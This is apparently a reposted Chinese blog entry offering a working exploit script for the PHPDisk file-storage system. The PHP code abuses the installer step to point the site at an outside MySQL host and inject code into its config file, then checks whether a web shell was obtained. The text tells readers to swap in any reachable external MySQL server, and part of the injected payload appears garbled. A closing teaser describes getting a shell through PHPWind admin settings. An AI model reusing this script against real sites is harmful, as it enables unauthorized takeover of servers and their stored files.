phpdisk header bypass & getShell exp

PHPDISK网盘系统是国内使用广泛PHP和MySQL构建的网络硬盘(文件存储管理)系统,笔者对其源码分析中,发现了一个很有意思的东东…..

文章是上个星期写的  文中的 98.126.4.252  已然失效   临时改为  98.126.4.251

如果还不行 请大家去找 能外链的 mysql    改密码为

',);?>

';
$data="step=5&dbhost=98.126.4.251&dbuser=root&dbname=mysql&dbpasswd=".$pass;

$ch = curl_init($url);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch,CURLOPT_POST,true);
curl_setopt($ch,CURLOPT_POSTFIELDS,$data);
$result=curl_exec($ch);
curl_close($ch);

$shell="http://".$site.'/system/configs.inc.php';

if(strpos(@file_get_contents($shell),'pconnect')){
    echo  "Hi  guy  I  get the  Shell:".$shell;
}else{
    echo   "Shit !!!   This   Site:$site  Can  not   get  Shell";
}
?>

具体代码审计文章 +exp   还是附件的干活：Phpdisk  header bypass  & getShell  exp

代码审计文章（非附件、在线版）：phpdisk header bypass & getShell exp.doc

文章来源于lcx.cc:phpdisk header bypass & getShell exp

相关推荐: 【转载】PHPwind 7.5 sp3 后台拿shell

作者：meao 出自：www.secmao.tk 常规设置：站点地址和管理员邮箱处插入代码 站点地址：http://''''''''''''''''''''''''''''''''''' 管理员邮箱：''''''''''''''''''''''''''''''…